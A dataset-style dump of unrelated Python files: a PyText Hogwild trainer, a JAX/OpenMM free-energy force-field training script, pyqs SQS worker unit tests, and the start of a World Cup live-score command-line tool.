source | python |
|---|---|
hogwild_trainer.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from typing import Any, Tuple
import torch
import torch.multiprocessing as mp
from pytext.common.constants import Stage
from pytext.config import PyTextConfig
from pytext.config.pytext_config import ConfigBase
from pytext.metric_reporters import MetricReporter
from pytext.models.model import Model
from pytext.trainers.trainer import Trainer
from pytext.utils import cuda_utils
from torchtext.data import Iterator
class HogwildTrainer(Trainer):
class Config(ConfigBase):
real_trainer: Trainer.Config = Trainer.Config()
num_workers: int = 1
@classmethod
def from_config(cls, config: Config, model: torch.nn.Module, *args, **kwargs):
# Hogwild training can't run on CUDA; with CUDA enabled or a single worker,
# fall back to the regular single-process Trainer.
if cuda_utils.CUDA_ENABLED or config.num_workers == 1:
return Trainer(config.real_trainer, *args, **kwargs)
return cls(config.real_trainer, config.num_workers, model, *args, **kwargs)
def __init__(
self, real_trainer_config, num_workers, model: torch.nn.Module, *args, **kwargs
):
super().__init__(real_trainer_config, model, *args, **kwargs)
self.num_workers = num_workers
def _run_epoch(
self,
stage,
epoch,
data_iter,
model,
metric_reporter,
pre_batch=lambda: None,
backprop=lambda loss, timer=None: None,
rank=0,
num_samples_to_log_progress=1000,
):
if stage == Stage.TRAIN:
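# Hogwild: spawn one process per worker; each runs a full epoch against the
# same shared-memory model (parameters are shared in train() below).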
processes = []
for worker_rank in range(self.num_workers):
# Initialize the batches with different random states.
data_iter.batches.init_epoch()
p = mp.Process(
target=super()._run_epoch,
args=(
stage,
epoch,
data_iter,
model,
metric_reporter,
pre_batch,
backprop,
worker_rank,
num_samples_to_log_progress,
),
)
processes.append(p)
p.start()
for p in processes:
p.join()
else:
return super()._run_epoch(
stage,
epoch,
data_iter,
model,
metric_reporter,
pre_batch,
backprop,
rank,
num_samples_to_log_progress,
)
def train(
self,
train_iter: Iterator,
eval_iter: Iterator,
model: Model,
metric_reporter: MetricReporter,
pytext_config: PyTextConfig,
*args,
**kwargs
) -> Tuple[torch.nn.Module, Any]:
print("Num of workers for Hogwild Training is {}".format(self.num_workers))
# Share memory of tensors for concurrent updates from multiple processes.
if self.num_workers > 1:
for param in model.parameters():
param.share_memory_()
return super().train(
train_iter, eval_iter, model, metric_reporter, pytext_config
)
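# A minimal standalone sketch (not part of PyText) of the Hogwild pattern used
# above: parameters are moved into shared memory, then several processes apply
# lock-free SGD updates to the same tensors. All names below are illustrative.
def _hogwild_sketch(num_workers: int = 2, steps: int = 50) -> None:
    model = torch.nn.Linear(10, 1)
    for param in model.parameters():
        param.share_memory_()  # updates from any process become visible to all

    def _worker_loop(shared_model):
        optimizer = torch.optim.SGD(shared_model.parameters(), lr=0.01)
        for _ in range(steps):
            x = torch.randn(4, 10)
            loss = shared_model(x).pow(2).mean()
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()  # races with other workers by design (Hogwild)

    # note: a nested target requires the 'fork' start method (the Linux default)
    workers = [mp.Process(target=_worker_loop, args=(model,)) for _ in range(num_workers)]
    for p in workers:
        p.start()
    for p in workers:
        p.join()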
|
parameterize_batch.py | import copy
import argparse
import time
import numpy as np
from io import StringIO
import itertools
import os
import sys
from jax.config import config as jax_config
# x64 mode must be enabled before any JAX computation runs
jax_config.update("jax_enable_x64", True)
from scipy.stats import special_ortho_group
import jax
import rdkit
from rdkit import Chem
from rdkit.Chem import AllChem
from simtk.openmm import app
from simtk.openmm.app import PDBFile
from timemachine.lib import custom_ops, ops
from fe.utils import to_md_units, write
from fe import math_utils
from multiprocessing import Process, Pipe
from matplotlib import pyplot as plt
from jax.experimental import optimizers
from fe import simulation
from fe import loss
from fe import dataset
from fe.pdb_writer import PDBWriter
from ff import forcefield
from ff import system
from ff import openmm_converter
def com(conf):
return np.sum(conf, axis=0)/conf.shape[0]
def recenter(conf, true_com, scale_factor=1):
mol_com = np.sum(conf, axis=0)/conf.shape[0]
centered = conf - mol_com # centered to origin
return true_com + centered/scale_factor
from hilbertcurve.hilbertcurve import HilbertCurve
def hilbert_sort(conf):
hc = HilbertCurve(16, 3)
int_confs = (conf*1000).astype(np.int64)+10000
dists = []
for xyz in int_confs.tolist():
dist = hc.distance_from_coordinates(xyz)
dists.append(dist)
perm = np.argsort(dists)
return perm
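# Typical usage (illustrative, not called elsewhere in this script):
#   perm = hilbert_sort(conf)
#   conf = conf[perm]  # reorder atoms for spatial locality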
def get_masses(m):
masses = []
for a in m.GetAtoms():
masses.append(a.GetMass())
return masses
import jax.numpy as jnp
def error_fn(all_du_dls, T, schedule, true_dG):
fwd = all_du_dls[:, :T//2]
fwd_sched = schedule[:T//2]
bkwd = all_du_dls[:, T//2:]
bkwd_sched = schedule[T//2:]
dG_fwd = math_utils.trapz(fwd, fwd_sched) # integral from inf to 0
dG_bkwd = math_utils.trapz(bkwd, bkwd_sched) # integral from 0 to inf
# dG_fwd and dG_bkwd come out with the same sign, so flip dG_bkwd to make
# both integrals run in the same direction (a requirement for pymbar.BAR).
dG_bkwd = -dG_bkwd
# Both values are in kJ/mol; the inputs to BAR need to be in units of kT.
kT = 2.479
# kT = 1
dG_fwd /= kT
dG_bkwd /= kT
pred_dG = loss.mybar(jnp.stack([dG_fwd, dG_bkwd]))
pred_dG *= kT
# print(dG_fwd, dG_bkwd)
print("pred_dG", pred_dG)
return jnp.abs(pred_dG - true_dG)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Quick Test')
parser.add_argument('--out_dir', type=str, required=True)
parser.add_argument('--precision', type=str, required=True)
parser.add_argument('--complex_pdb', type=str, required=True)
parser.add_argument('--ligand_sdf', type=str, required=True, nargs="*")
parser.add_argument('--num_gpus', type=int, required=True)
parser.add_argument('--num_conformers', type=int, required=True)
parser.add_argument('--forcefield', type=str, required=True)
args = parser.parse_args()
assert os.path.isdir(args.out_dir)
if args.precision == 'single':
precision = np.float32
elif args.precision == 'double':
precision = np.float64
else:
raise Exception("precision must be either single or double")
num_gpus = args.num_gpus
all_du_dls = []
start = 1e3
end = 1.0
NT = 500
base = np.exp(np.log(end/start)/NT)
exps = np.arange(NT)
part_one = np.power(base, exps)*start
part_two = np.linspace(1.0, 0.3, 1000)
part_three = np.linspace(0.3, 0.0, 4000)
forward_schedule = np.concatenate([part_one, part_two, part_three])
backward_schedule = forward_schedule[::-1]
lambda_schedule = np.concatenate([forward_schedule, backward_schedule])
T = lambda_schedule.shape[0]
assert T % 2 == 0
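# The combined schedule runs forward (lambda ~1000 -> 0 over 500+1000+4000
# steps) and then mirrors itself, so T = 11000 and error_fn's forward/backward
# halves correspond to the insertion and deletion legs.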
dt = 0.0015
step_sizes = np.ones(T)*dt
cas = np.ones(T)*0.93
host_pdb_file = args.complex_pdb
host_pdb = app.PDBFile(host_pdb_file)
host_conf = []
for x,y,z in host_pdb.positions:
host_conf.append([to_md_units(x),to_md_units(y),to_md_units(z)])
host_conf = np.array(host_conf)
host_name = "complex"
# set up the system
amber_ff = app.ForceField('amber99sbildn.xml', 'amber99_obc.xml')
host_system = amber_ff.createSystem(host_pdb.topology,
nonbondedMethod=app.NoCutoff,
constraints=None,
rigidWater=False)
host_system = openmm_converter.deserialize_system(host_system)
num_host_atoms = len(host_system.masses)
print("num_host_atoms", num_host_atoms)
for ligand_sdf_file in args.ligand_sdf:
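# keep only the first molecule from each SDF (the break exits after entry 0)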
for guest_mol in Chem.SDMolSupplier(ligand_sdf_file, removeHs=False):
break
open_ff = forcefield.Forcefield(args.forcefield)
nrg_fns = open_ff.parameterize(guest_mol)
guest_masses = get_masses(guest_mol)
guest_system = system.System(nrg_fns, open_ff.params, open_ff.param_groups, guest_masses)
off_groups_path = os.path.join(args.out_dir, "original_off_param_groups.txt")
np.savetxt(off_groups_path, open_ff.param_groups)
combined_system = host_system.merge(guest_system)
cbs = -1*np.ones_like(np.array(combined_system.masses))*0.0001
lambda_idxs = np.zeros(len(combined_system.masses), dtype=np.int32)
lambda_idxs[num_host_atoms:] = -1
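# assumed semantics: guest atoms are tagged -1 so the lambda schedule
# (de)couples them from the host, while host atoms (0) stay fully interacting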
sim = simulation.Simulation(
combined_system,
step_sizes,
cas,
cbs,
lambda_schedule,
lambda_idxs,
precision
)
initial_params = sim.system.params
lr = 5e-4
# opt_init, opt_update, get_params = optimizers.adam(lr)
opt_init, opt_update, get_params = optimizers.sgd(lr)
opt_state = opt_init(initial_params)
num_epochs = 100
# torsion, charge, gb radii, gb scaling factor, torsion
vary_allowed_groups = [(7, 0.5)]*10 + [(14, 0.5)]*20 + [(12, 1e-2)]*20 + [(13, 1e-2)]*20 + [(7, 0.5)]*30
assert len(vary_allowed_groups) == num_epochs
ligand_list = []
for ligand_sdf_file in args.ligand_sdf:
for rd_mol in Chem.SDMolSupplier(ligand_sdf_file):
dG_value = rd_mol.GetProp("_dG")
ligand_list.append((rd_mol, float(dG_value)))
ligand_dataset = dataset.Dataset(ligand_list)
train, test = ligand_dataset.split(0.7)
loss_file_path = os.path.join(args.out_dir, "loss.txt")
if os.path.exists(loss_file_path):
os.remove(loss_file_path)
for epoch in range(num_epochs):
for idx, ds in enumerate([train, test]):
if idx == 1:
inference = True
job_name = 'test'
else:
inference = False
job_name = 'train'
ds.shuffle()
for id, data in enumerate(ds.iterbatches(1)):
# sample from the RDKit distance-geometry conformer distribution (this could be swapped for another distribution later)
guest_mol = copy.deepcopy(data[0][0])
true_dG = data[0][1] # in kJ/mol and positive sign
init_conf = guest_mol.GetConformer(0)
init_conf = np.array(init_conf.GetPositions(), dtype=np.float64)
init_conf = init_conf/10 # convert angstroms to nm (MD units)
conf_com = com(init_conf)
init_mol = Chem.Mol(guest_mol)
num_conformers = args.num_conformers
# generate a set of gas phase conformers using the RDKit
guest_mol.RemoveAllConformers()
AllChem.EmbedMultipleConfs(guest_mol, num_conformers, randomSeed=2020)
np.random.seed(2020)
for conf_idx in range(num_conformers):
conformer = guest_mol.GetConformer(conf_idx)
guest_conf = np.array(conformer.GetPositions(), dtype=np.float64)
guest_conf = guest_conf/10 # convert angstroms to nm (MD units)
rot_matrix = special_ortho_group.rvs(3).astype(dtype=np.float64)
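# apply a random rotation, then convert back from nm to angstroms before
# writing the coordinates into the RDKit conformer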
guest_conf = np.matmul(guest_conf, rot_matrix)*10
for atom_idx, pos in enumerate(guest_conf):
conformer.SetAtomPosition(atom_idx, (float(pos[0]), float(pos[1]), float(pos[2])))
open_ff = forcefield.Forcefield(args.forcefield)
nrg_fns = open_ff.parameterize(guest_mol)
guest_masses = get_masses(guest_mol)
guest_system = system.System(nrg_fns, open_ff.params, open_ff.param_groups, guest_masses)
combined_system = host_system.merge(guest_system)
cbs = -1*np.ones_like(np.array(combined_system.masses))*0.0001
lambda_idxs = np.zeros(len(combined_system.masses), dtype=np.int32)
lambda_idxs[num_host_atoms:] = -1
sim = simulation.Simulation(
combined_system,
step_sizes,
cas,
cbs,
lambda_schedule,
lambda_idxs,
precision
)
epoch_train_params = get_params(opt_state)
if not inference:
epoch_train_ff_params = copy.deepcopy(open_ff)
epoch_train_ff_params.params = epoch_train_params[len(host_system.params):]
fname = "epoch_"+str(epoch)+"_ligand_"+str(id)+"_params"
fpath = os.path.join(args.out_dir, fname)
epoch_train_ff_params.save(fpath)
sim.system.params = np.asarray(epoch_train_params)
all_args = []
child_conns = []
parent_conns = []
for conf_idx in range(num_conformers):
conformer = guest_mol.GetConformer(conf_idx)
guest_conf = np.array(conformer.GetPositions(), dtype=np.float64)
guest_conf = guest_conf/10 # convert angstroms to nm (MD units)
guest_conf = recenter(guest_conf, conf_com)
x0 = np.concatenate([host_conf, guest_conf]) # combined geometry
combined_pdb = Chem.CombineMols(Chem.MolFromPDBFile(host_pdb_file, removeHs=False), init_mol)
combined_pdb_str = StringIO(Chem.MolToPDBBlock(combined_pdb))
out_file = os.path.join(args.out_dir, "epoch_"+str(epoch)+"_insertion_deletion_"+job_name+"_"+host_name+"_ligand_"+str(id)+"_conf_"+str(conf_idx)+".pdb")
writer = PDBWriter(combined_pdb_str, out_file)
v0 = np.zeros_like(x0)
parent_conn, child_conn = Pipe()
parent_conns.append(parent_conn)
# writer may be None if visualization output is not needed
all_args.append([x0, v0, conf_idx % num_gpus, writer, child_conn])
processes = []
for arg in all_args:
p = Process(target=sim.run_forward_and_backward, args=arg)
p.daemon = True
processes.append(p)
p.start()
all_du_dls = []
for pc in parent_conns:
du_dls = pc.recv()
all_du_dls.append(du_dls)
all_du_dls = np.array(all_du_dls)
loss_grad_fn = jax.grad(error_fn, argnums=(0,))
if inference:
# test mode
error = error_fn(all_du_dls, T, lambda_schedule, true_dG)
print("---EPOCH", epoch, "---Test---LOSS", error)
with open(loss_file_path, "a+") as f:
f.write("---EPOCH %d---Test---LOSS---%f\n\n " % (epoch, error))
for pc in parent_conns:
pc.send(None)
pc.close()
else:
# training mode, so we need to compute the derivatives
error = error_fn(all_du_dls, T, lambda_schedule, true_dG)
print("---EPOCH", epoch, "---Train---LOSS", error)
with open(loss_file_path, "a+") as f:
f.write("---EPOCH %d---Train---LOSS---%f\n\n " % (epoch, error))
error_grad = loss_grad_fn(all_du_dls, T, lambda_schedule, true_dG)
all_du_dl_adjoints = error_grad[0]
# send everything at once
for pc, du_dl_adjoints in zip(parent_conns, all_du_dl_adjoints):
pc.send(du_dl_adjoints)
# receive everything at once
all_dl_dps = []
for pc in parent_conns:
dl_dp = pc.recv()
all_dl_dps.append(dl_dp)
all_dl_dps = np.array(all_dl_dps)
all_dl_dps = np.sum(all_dl_dps, axis=0)
allowed_groups = {vary_allowed_groups[epoch][0]: vary_allowed_groups[epoch][1]}
filtered_grad = []
for g_idx, (g, gp) in enumerate(zip(all_dl_dps, sim.system.param_groups)):
if gp in allowed_groups:
pf = allowed_groups[gp]
filtered_grad.append(g*pf)
if g != 0:
print("derivs", g_idx, '\t group', gp, '\t', g, '\t adjusted to', g*pf, '\t old val', sim.system.params[g_idx])
else:
filtered_grad.append(0)
filtered_grad = np.array(filtered_grad)
opt_state = opt_update(epoch, filtered_grad, opt_state)
for pc in parent_conns:
pc.close()
# wait for all worker processes to finish
for p in processes:
p.join()
|
test_worker.py | import json
import logging
import time
import threading
from multiprocessing import Queue
try:
from queue import Empty
except ImportError:
from Queue import Empty
import boto3
from moto import mock_sqs
from mock import patch, Mock
from pyqs.worker import ManagerWorker, ReadWorker, ProcessWorker, BaseWorker, MESSAGE_DOWNLOAD_BATCH_SIZE
from pyqs.utils import decode_message
from tests.tasks import task_results
from tests.utils import MockLoggingHandler
BATCHSIZE = 10
INTERVAL = 0.1
@mock_sqs
def test_worker_fills_internal_queue():
"""
Test read workers fill internal queue
"""
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
message = json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
})
conn.send_message(QueueUrl=queue_url, MessageBody=message)
internal_queue = Queue()
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE)
worker.read_message()
packed_message = internal_queue.get(timeout=1)
found_message_body = decode_message(packed_message['message'])
found_message_body.should.equal({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
})
@mock_sqs
def test_worker_fills_internal_queue_only_until_maximum_queue_size():
"""
Test read workers fill internal queue only to maximum size
"""
conn = boto3.client('sqs', region_name='us-east-1')
# Set visibility timeout low to improve test speed
queue_url = conn.create_queue(QueueName="tester", Attributes={'VisibilityTimeout': '1'})['QueueUrl']
message = json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
})
for i in range(3):
conn.send_message(QueueUrl=queue_url, MessageBody=message)
internal_queue = Queue(maxsize=2)
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE)
worker.read_message()
# The internal queue should only have two messages on it
internal_queue.get(timeout=1)
internal_queue.get(timeout=1)
try:
internal_queue.get(timeout=1)
except Empty:
pass
else:
raise AssertionError("The internal queue should be empty")
@mock_sqs
def test_worker_fills_internal_queue_from_celery_task():
"""
Test read workers fill internal queue with celery tasks
"""
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
message = '{"body": "KGRwMApTJ3Rhc2snCnAxClMndGVzdHMudGFza3MuaW5kZXhfaW5jcmVtZW50ZXInCnAyCnNTJ2Fy\\nZ3MnCnAzCihscDQKc1Mna3dhcmdzJwpwNQooZHA2ClMnbWVzc2FnZScKcDcKUydUZXN0IG1lc3Nh\\nZ2UyJwpwOApzcy4=\\n", "some stuff": "asdfasf"}'
conn.send_message(QueueUrl=queue_url, MessageBody=message)
internal_queue = Queue()
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE)
worker.read_message()
packed_message = internal_queue.get(timeout=1)
found_message_body = decode_message(packed_message['message'])
found_message_body.should.equal({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message2',
},
})
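# The opaque "body" above is a base64-encoded protocol-0 pickle; a sketch of
# what decode_message() is expected to recover (variable names are assumptions):
#   import base64, pickle
#   task = pickle.loads(base64.b64decode(raw_body))  # raw_body = the "body" field
#   # -> {'task': 'tests.tasks.index_incrementer', 'args': [], 'kwargs': {...}}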
@mock_sqs
def test_worker_processes_tasks_from_internal_queue():
"""
Test worker processes read from internal queue
"""
del task_results[:]
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to queue
internal_queue = Queue()
internal_queue.put({"message": message, "queue": queue_url, "start_time": time.time(), "timeout": 30})
# Process message
worker = ProcessWorker(internal_queue, INTERVAL)
worker.process_message()
task_results.should.equal(['Test message'])
# We expect the queue to be empty now
try:
internal_queue.get(timeout=1)
except Empty:
pass
else:
raise AssertionError("The internal queue should be empty")
@mock_sqs
def test_worker_fills_internal_queue_and_respects_visibility_timeouts():
"""
Test read workers respect visibility timeouts
"""
# Setup logging
logger = logging.getLogger("pyqs")
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester", Attributes={'VisibilityTimeout': '1'})['QueueUrl']
# Add messages
message = json.dumps({"body": "KGRwMApTJ3Rhc2snCnAxClMndGVzdHMudGFza3MuaW5kZXhfaW5jcmVtZW50ZXInCnAyCnNTJ2Fy\nZ3MnCnAzCihscDQKc1Mna3dhcmdzJwpwNQooZHA2ClMnbWVzc2FnZScKcDcKUydUZXN0IG1lc3Nh\nZ2UyJwpwOApzcy4=\n", "some stuff": "asdfasf"})
for _ in range(3):
conn.send_message(QueueUrl=queue_url, MessageBody=message)
# Run Reader
internal_queue = Queue(maxsize=1)
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE)
worker.read_message()
# Check log messages
logger.handlers[0].messages['warning'][0].should.contain("Timed out trying to add the following message to the internal queue")
logger.handlers[0].messages['warning'][1].should.contain("Clearing Local messages since we exceeded their visibility_timeout")
@mock_sqs
def test_worker_processes_tasks_and_logs_correctly():
"""
Test worker processes logs INFO correctly
"""
# Setup logging
logger = logging.getLogger("pyqs")
del logger.handlers[:]
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue()
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
# Process message
worker = ProcessWorker(internal_queue, INTERVAL)
worker.process_message()
# Check output
kwargs = json.loads(message['Body'])['kwargs']
expected_result = u"Processed task tests.tasks.index_incrementer in 0.0000 seconds with args: [] and kwargs: {}".format(kwargs)
logger.handlers[0].messages['info'].should.equal([expected_result])
@mock_sqs
def test_worker_processes_tasks_and_logs_warning_correctly():
"""
Test worker processes logs WARNING correctly
"""
# Setup logging
logger = logging.getLogger("pyqs")
del logger.handlers[:]
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue()
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
# Process message
worker = ProcessWorker(internal_queue, INTERVAL)
worker.process_message()
# Check output
kwargs = json.loads(message['Body'])['kwargs']
msg1 = "Task tests.tasks.index_incrementer raised error in 0.0000 seconds: with args: [] and kwargs: {}: Traceback (most recent call last)".format(kwargs) # noqa
logger.handlers[0].messages['error'][0].lower().should.contain(msg1.lower())
msg2 = 'raise ValueError("Need to be given basestring, was given {}".format(message))\nValueError: Need to be given basestring, was given 23' # noqa
logger.handlers[0].messages['error'][0].lower().should.contain(msg2.lower())
@mock_sqs
def test_worker_processes_empty_queue():
"""
Test worker processes read from empty internal queue
"""
internal_queue = Queue()
worker = ProcessWorker(internal_queue, INTERVAL)
worker.process_message()
@patch("pyqs.worker.os")
def test_parent_process_death(os):
"""
Test worker processes recognize parent process death
"""
os.getppid.return_value = 1
worker = BaseWorker()
worker.parent_is_alive().should.be.false
@patch("pyqs.worker.os")
def test_parent_process_alive(os):
"""
Test worker processes recognize when parent process is alive
"""
os.getppid.return_value = 1234
worker = BaseWorker()
worker.parent_is_alive().should.be.true
@mock_sqs
@patch("pyqs.worker.os")
def test_read_worker_with_parent_process_alive_and_should_not_exit(os):
"""
Test read workers do not exit when parent is alive and shutdown is not set
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Setup PPID
os.getppid.return_value = 1234
# Setup dummy read_message
def read_message():
raise Exception("Called")
# When I have a parent process, and shutdown is not set
worker = ReadWorker(queue_url, "foo", BATCHSIZE)
worker.read_message = read_message
# Then read_message() is reached
worker.run.when.called_with().should.throw(Exception, "Called")
@mock_sqs
@patch("pyqs.worker.os")
def test_read_worker_with_parent_process_alive_and_should_exit(os):
"""
Test read workers exit when parent is alive and shutdown is set
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Setup PPID
os.getppid.return_value = 1234
# Setup internal queue
q = Queue(1)
# When I have a parent process, and shutdown is set
worker = ReadWorker(queue_url, q, BATCHSIZE)
worker.read_message = Mock()
worker.shutdown()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_read_worker_with_parent_process_dead_and_should_not_exit(os):
"""
Test read workers exit when parent is dead and shutdown is not set
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Setup PPID
os.getppid.return_value = 1
# Setup internal queue
q = Queue(1)
# When I have no parent process, and shutdown is not set
worker = ReadWorker(queue_url, q, BATCHSIZE)
worker.read_message = Mock()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_process_worker_with_parent_process_alive_and_should_not_exit(os):
"""
Test worker processes do not exit when parent is alive and shutdown is not set
"""
# Setup PPID
os.getppid.return_value = 1234
# Setup dummy process_message
def process_message():
raise Exception("Called")
# When I have a parent process, and shutdown is not set
worker = ProcessWorker("foo", INTERVAL)
worker.process_message = process_message
# Then process_message() is reached
worker.run.when.called_with().should.throw(Exception, "Called")
@mock_sqs
@patch("pyqs.worker.os")
def test_process_worker_with_parent_process_dead_and_should_not_exit(os):
"""
Test worker processes exit when parent is dead and shutdown is not set
"""
# Setup PPID
os.getppid.return_value = 1
# When I have no parent process, and shutdown is not set
worker = ProcessWorker("foo", INTERVAL)
worker.process_message = Mock()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_process_worker_with_parent_process_alive_and_should_exit(os):
"""
Test worker processes exit when parent is alive and shutdown is set
"""
# Setup PPID
os.getppid.return_value = 1234
# When I have a parent process, and shutdown is set
worker = ProcessWorker("foo", INTERVAL)
worker.process_message = Mock()
worker.shutdown()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
def test_worker_processes_shuts_down_after_processing_its_maximum_number_of_messages():
"""
Test worker processes shutdown after processing maximum number of messages
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue(3)
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
# When I Process messages
worker = ProcessWorker(internal_queue, INTERVAL)
worker._messages_to_process_before_shutdown = 2
# Then I return from run()
worker.run().should.be.none
# With messages still on the queue
internal_queue.empty().should.be.false
internal_queue.full().should.be.false
@mock_sqs
def test_worker_processes_discard_tasks_that_exceed_their_visibility_timeout():
"""
Test worker processes discards tasks that exceed their visibility timeout
"""
# Setup logging
logger = logging.getLogger("pyqs")
del logger.handlers[:]
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue with timeout of 0 that started long ago
internal_queue = Queue()
internal_queue.put({"queue": queue_url, "message": message, "start_time": 0, "timeout": 0})
# When I process the message
worker = ProcessWorker(internal_queue, INTERVAL)
worker.process_message()
# Then I get an error about exceeding the visibility timeout
kwargs = json.loads(message['Body'])['kwargs']
msg1 = "Discarding task tests.tasks.index_incrementer with args: [] and kwargs: {} due to exceeding visibility timeout".format(kwargs) # noqa
logger.handlers[0].messages['warning'][0].lower().should.contain(msg1.lower())
@mock_sqs
def test_worker_processes_only_increases_processed_counter_if_a_message_was_processed():
"""
Test worker process only increases processed counter if a message was processed
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue(3)
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
# And we add a message to the queue later
def sleep_and_queue(internal_queue):
time.sleep(1)
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
thread = threading.Thread(target=sleep_and_queue, args=(internal_queue,))
thread.daemon = True
thread.start()
# When I Process messages
worker = ProcessWorker(internal_queue, INTERVAL)
worker._messages_to_process_before_shutdown = 2
# Then I return from run() after processing 2 messages
worker.run().should.be.none
@mock_sqs
def test_worker_negative_batch_size():
"""
Test workers with negative batch sizes
"""
BATCHSIZE = -1
CONCURRENCY = 1
QUEUE_PREFIX = "tester"
INTERVAL = 0.0
conn = boto3.client('sqs', region_name='us-east-1')
conn.create_queue(QueueName="tester")['QueueUrl']
worker = ManagerWorker(QUEUE_PREFIX, CONCURRENCY, INTERVAL, BATCHSIZE)
worker.batchsize.should.equal(1)
@mock_sqs
def test_worker_too_large_batch_size():
"""
Test workers with an overly large batch size
"""
BATCHSIZE = 10000
CONCURRENCY = 1
QUEUE_PREFIX = "tester"
INTERVAL = 0.0
conn = boto3.client('sqs', region_name='us-east-1')
conn.create_queue(QueueName="tester")['QueueUrl']
worker = ManagerWorker(QUEUE_PREFIX, CONCURRENCY, INTERVAL, BATCHSIZE)
worker.batchsize.should.equal(MESSAGE_DOWNLOAD_BATCH_SIZE)
|
worldcup_live.py | #coding: utf-8
''' World Cup Live
'''
# Available colors:
# Fore: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE
# Back: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
# Style: DIM, NORMAL, BRIGHT, RESET_ALL
# TODO: Remove mocks.
# TODO: Show groups.
from multiprocessing import Process, Lock
from colorama import init, Fore, Style, Back
from time import sleep
from datetime import timedelta
import signal
import sys
import requests
import json
import dateutil.parser
NOT_RECOGNIZE = Fore.RED + 'I\'m sorry, I do not recognize this command.'
SOCCER_BALL = u"\U000026bd"
SCREEN_WIDTH = 65 # Must be odd.
UNCHECKED_BOX = u"\U00002b1c"
CHECKED_BOX = u"\U00002611"
UPDATE_TIME = 32
ASCII_ART = '' + '╦ ╦┌─┐┬─┐┬ ┌┬┐ ╔═╗┬ ┬┌─┐ ╦ ┬┬ ┬┌─┐\n' + '║║║│ │├┬┘│ ││ ║ │ │├─┘ ║ │└┐┌┘├┤ \n' + '╚╩╝└─┘┴└─┴─┘─┴┘ ╚═╝└─┘┴ ╩═╝┴ └┘ └─┘'
ASCII_ART += '0.1\nhttps://github.com/silvamatteus/worldcup-live-cli'
TIME_DIFFERENCE = -6 # In hours.
def print_help():
